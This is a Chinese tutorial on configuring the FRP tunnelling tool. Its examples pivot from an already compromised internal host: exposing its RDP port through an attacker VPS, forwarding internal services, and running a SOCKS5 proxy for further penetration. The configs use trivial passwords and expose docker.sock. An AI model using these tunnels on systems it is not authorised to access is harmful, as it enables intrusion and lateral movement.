frp工具的使用
0x01 FRP简介
FRP(Fast Reverse Proxy) 是一款简单,好用,稳定的隧道工具。FRP 使用 Go 语言开发,它是一款高性能的反向代理应用,可以轻松地进行内网穿透,对外网提供服务。 FRP 支持 TCP、UDP、KCP、HTTP、HTTPS等协议类型,并且支持 Web 服务根据域名进行路由转发。在进行内网渗透中,FRP是常用的一款隧道工具。可以初略理解为一个中转站, 帮助你实现公网<--->FRP服务器<--->家庭内网的连接,让内网的设备可以被公网访问到。
FRP中文官方教程: https://github.com/fatedier/frp/blob/master/README_zh.md
使用FRP建立隧道: 现在有这么一个场景,我们获得了一个位于内网的通过NAT方式对外提供服务的主机的权限,现在我们需要对其所在的内网继续进行渗透。 于是,我们就需要通过FRP建立一个隧道,让我们的主机可以通过隧道访问其内网。
0x02 下载
下载地址:https://github.com/fatedier/frp/releases
注意事项:
1)服务器端和内网机器端下载的版本要相同,否则可能会影响内网穿透
2)根据服务器系统选择合适的脚本
脚本主要分为服务端与客户端文件
1)外网服务器端用到的是Frps和Frps.ini,客户端用到的是Frpc和Frpc.ini
2) 服务端部署可以只保留服务端文件 , 客户端部署可以只保留客户端文件
0x03 外网服务器端配置(VPS)
1)解压压缩包
tar xzvf frp_0.33.0_linux_386.tar.gz
2)配置服务端(编辑frps.ini文件)
[common]
#绑定的ip,为本机ip
bind_addr = 0.0.0.0
#绑定的端口
bind_port = 17000
#管理地址
dashboard_addr = 0.0.0.0
#管理端口
dashboard_port = 27500
#管理的用户名
dashboard_user = root
#管理用户的密码
dashboard_pwd = 123456
#客户端服务端连接的密码
token = 1q2w3e
#心跳超时时间
heartbeat_timeout = 90
3)启动服务端
./frps -c frps.ini #前台启动
nohup ./frps -c frps.ini & # 后台启动
4)测试连接
启动之后会有日志输出,面板访问http://vps_ip:27500,账户密码是上面配置的
0x04 内网客户端配置
1)解压之后配置客户端(编辑frpc.ini文件)
[common]
# 服务器的ip地址和端口
server_addr = vps_ip
server_port = 17000
#连接服务器的密码
token = 1q2w3e
pool_count = 5
#指定协议类型
protocol = tcp
health_check_type = tcp
health_check_interval_s = 100
[test]
#代理的端口
remote_port = 10000
#使用的协议
plugin = socks5
#是否加密
use_encryption = true
#是否压缩
use_compression = true
2)启动客户端
frpc -c frpc.ini # windows启动
0x05 示例-利用FRP映射3389端口
现在有这么一个场景,我们获得了位于内网的一台主机的权限,并且知道了他的登录用户名和密码。他的3389端口只对内网开放,现在我们需要将该主机的3389端口映射到公网我们的VPS的3389端口,那样,我们连接我们VPS的3389端口就相当于连接内网主机的3389端口了。
1)服务端配置保持和上面的服务端(VPS)配置不变
[common]
#绑定的ip,为本机ip
bind_addr = 0.0.0.0
#绑定的端口
bind_port = 17000
#管理地址
dashboard_addr = 0.0.0.0
#管理端口
dashboard_port = 27500
#管理的用户名
dashboard_user = root
#管理用户的密码
dashboard_pwd = 123456
#客户端服务端连接的密码
token = 1q2w3e
#心跳超时时间
heartbeat_timeout = 90
2)客户端配置
[common]
server_addr = vps_ip
server_port = 17000
token = 1q2w3e
[RDP]
type = tcp
local_ip = 127.0.0.1
local_port = 3389
remote_port = 2500
3)启动之后,接着看看frpsWEB服务上面的状态,可以见到有一个客户端了,还有一个代理
4)在tcp里面可以看到代理出来的内网端口7389,接下来我们就通过vpsIP加上这个端口就可以访问内网的3389了
5)用另外一台电脑mstsc启动远程连接:vps_ip:2500,输入远程桌面密码,即可连接
0x06 示例-多端口转发
1)公网服务器frps配置(VPS)
[common]
bind_port = 7000
dashboard_user = admin
dashboard_pwd = 123456
2)内网服务器frpc配置
[common]
server_addr = vps_ip
server_port = 7000
dashboard_user = admin
dashboard_pwd = 123456
[frp-work]
type = tcp
local_ip = 192.168.1.122
local_port = 80
remote_port = 80
[frp-web]
type = tcp
local_ip = 192.168.1.133
local_port = 3081
remote_port = 3081
[frp-api]
type = tcp
local_ip = 192.168.1.133
local_port = 3082
remote_port = 3082
0x07 示例-搭建socks5代理
1) kali设置代理
vi /etc/proxychains4.conf
2)内网目标机器frpc.ini
[common]
server_addr = 1.166.166.6
server_port = 7000
[http_proxy]
type = tcp
remote_port = 7777
plugin = socks5
3)服务端
[common]
bind_addr = 0.0.0.0
bind_port = 7000
附录
1、相关启动命令
linux环境下启动服务,需要先把运行文件添加可执行权限。例如我的文件实在root文件夹中,我需要搭建frp服务端,那么待设置好服务端配置文件(frps.ini)后执行以下命令即可。
cd /root
chmod +x frps
nohup ./frps -c ./frps.ini &
执行成功后,会显示frp的进程号码。你也可以通过命令来查看frps运行的进程编号。
ps -e | grep frps
在windows环境下则是以管理员身份运行cmd命令提示符。进入相应的目录后,运行命令即可。
frps -c frps.ini &
2、frps.ini(服务端)详细配置文件解释说明
[common]
# 穿透监听端口与地址0.0.0.0表示允许任何地址)
bind_addr = 0.0.0.0
bind_port = 7000
# udp协议监听端口
bind_udp_port = 7001
#udp协议支持kcp模式。kcp的运行端口,不设置表示禁用。可以与'bind_port'端口一致
kcp_bind_port = 7000
# 指定代理将侦听的地址,默认值与bind_addr相同
# proxy_bind_addr = 127.0.0.1
# 虚拟主机穿透监听端口指http与https的访问端)
# 注意:http端口和https端口可以与bind_port相同
vhost_http_port = 80
vhost_https_port = 443
# 为虚拟主机http服务器响应头超时(秒),默认是60秒
# vhost_http_timeout = 60
# 客户端地址与端口
dashboard_addr = 0.0.0.0
dashboard_port = 7500
# 客户端账户
dashboard_user = admin
dashboard_pwd = admin
# frp日志记录路径
log_file = ./frps.log
# 日志记录级别(trace, debug, info, warn, error)
log_level = info
# 日志保存的天数,默认3天
log_max_days = 3
# 身份验证令牌
token = 12345678
# 客户端与服务端连接心跳检测,默认值为90
# heartbeat_timeout = 90
# 允许客户端使用的穿透端口,不设置则全部允许
allow_ports = 2000-3000,3001,3003,4000-50000
# 在每个代理pool_count将变更为max_pool_count如果他们超过最大值
max_pool_count = 5
# 单个客户端允许建立的穿透服务,0为不限制
max_ports_per_client = 0
# 如果subdomain_host不为空,则可以设置子域时类型是HTTP或HTTPS在FRPC的配置文件
# 子域名测试时,路由使用的主机是test.frps.com
subdomain_host = frps.com
# tcp流多路复用(可以理解为优化传输) ,如果使用tcp stream multiplexing,则默认为true
tcp_mux = true
3、frpc.ini(客户端)详细配置文件解释说明
[common]
#服务端的访问地址(可用ip或者域名)。
server_addr = 0.0.0.0
##服务端用于穿透的端口,与服务端保持一致。
server_port = 7000
# 日志记录路径
log_file = ./frpc.log
# 日志记录级别(trace, debug, info, warn, error)
log_level = info
# 日志保存的天数,默认3天
log_max_days = 3
# 身份验证令牌
token = 12345678
# frpc客户端管理界面配置
admin_addr = 127.0.0.1
admin_port = 7400
admin_user = admin
admin_pwd = admin
# 连接池,连接将提前成立,默认值是零
pool_count = 5
# tcp数据流多路复用,默认开启,服务端客户端需要保持一致
tcp_mux = true
#您的代理名称将更改为{user}。{proxy}
user = your_name
# 失败重连,默认为true
login_fail_exit = true
# 服务端与客户端通信协议,支持tcp\upd
protocol = tcp
# if tls_enable is true, frpc will connect frps by tls
tls_enable = true
#指定一个dns服务器,所以frpc将使用它而不是默认值
# dns_server = 8.8.8.8
#您要开始的代理名称除以','
#默认为空,意味着所有代理# start = ssh,dns
#客户端向服务端心跳检查间隔与超时时间
heartbeat_interval = 10
heartbeat_timeout = 90
##############以上为客户端服务的公共信息配置区域############
###############具体的穿透服务功能启用(表示你要使用frp的那个功能)##############
[ssh]
#穿透类型
type = tcp
#需穿透服务本地访问地址
local_ip = 127.0.0.1
#需穿透服务本地访问端口
local_port = 22
#是否使用通讯加密,默认false
use_encryption = false
#是否使用通讯压缩,默认false
use_compression = false
#穿透后外网访问端口。
remote_port = 6001
[dns]
type = udp
local_ip = 114.114.114.114
local_port = 53
remote_port = 6002
use_encryption = false
use_compression = false
#http或者https模式主要针对于虚拟主机,访问的取决于frps.ini文件中的vhost_http_port设置
[web01]
type = http
local_ip = 127.0.0.1
local_port = 80
use_encryption = false
use_compression = true
#虚拟主机访问账户密码设置,如果不设置的话。自己通过地址即可访问。
http_user = admin
http_pwd = admin
# if domain for frps is frps.com, then you can access [web01] proxy by URL http://test.frps.com
#如果你的frps域名是yourdomain.com,那么你可以通过web01.yourdomain.com 来访问web01这个穿透服务。
subdomain = web01
#自己定义域名
custom_domains = yourdomain.com
#locations 仅适用于HTTP类型
locations = /,/pic
# http重定向地址
host_header_rewrite = example.com
# http请求文件头
header_X-From-Where = frp
health_check_type = http
# FRPC将发送GET HTTP请求“/状态”本地HTTP服务
#http http服务返回2xx http响应代码时处于活动状态
health_check_url = / status
health_check_interval_s = 10
health_check_max_failed = 3
health_check_timeout_s = 3
[web02]
type = https
local_ip = 127.0.0.1
local_port = 8000
use_encryption = false
use_compression = false
subdomain = web02
custom_domains = web02.yourdomain.com
[plugin_unix_domain_socket]
type = tcp
remote_port = 6003
#如果插件被定义,local_ip和LOCAL_PORT是无用
plugin = unix_domain_socket
#前缀PARAMS“plugin_”该插件需要
plugin_unix_path = /var/run/docker.sock
[plugin_http_proxy]
type = tcp
remote_port = 6004
plugin = http_proxy
plugin_http_user = abc
plugin_http_passwd = abc
[plugin_socks5]
type = tcp
remote_port = 6005
plugin = socks5
plugin_user = abc
plugin_passwd = abc
[plugin_static_file]
type = tcp
remote_port = 6006
plugin = static_file
plugin_local_path = / var / www / blog
plugin_strip_prefix = static
plugin_http_user = abc
plugin_http_passwd = abc
[secret_tcp]
#如果类型是秘密tcp,则remote_port是无用的
#想要连接本地端口的人应该使用stcp代理部署另一个frpc,并且role是visitor
type = stcp
# SK用于身份验证的访客
sk = abcdefg
local_ip = 127.0.0.1
local_port = 22
use_encryption = false
use_compression = false
# FRPC的用户应该在这两个STCP服务器和STCP游客一样
[secret_tcp_visitor]
# FRPC作用访客- >FRPC角色服务器
role = visitor
type = stcp
#您要访问的服务器名称
server_name = secret_tcp
sk = abcdefg
#将此地址连接到访问者stcp服务器
bind_addr = 127.0.0.1
bind_port = 9000
use_encryption = false
use_compression = false
[p2p_tcp]
type = xtcp
sk = abcdefg
local_ip = 127.0.0.1
local_port = 22
use_encryption = false
use_compression = false
[p2p_tcp_visitor]
role = visitor
type = xtcp
server_name = p2p_tcp
sk = abcdefg
bind_addr = 127.0.0.1
bind_port = 9001
use_encryption = false
use_compression = false
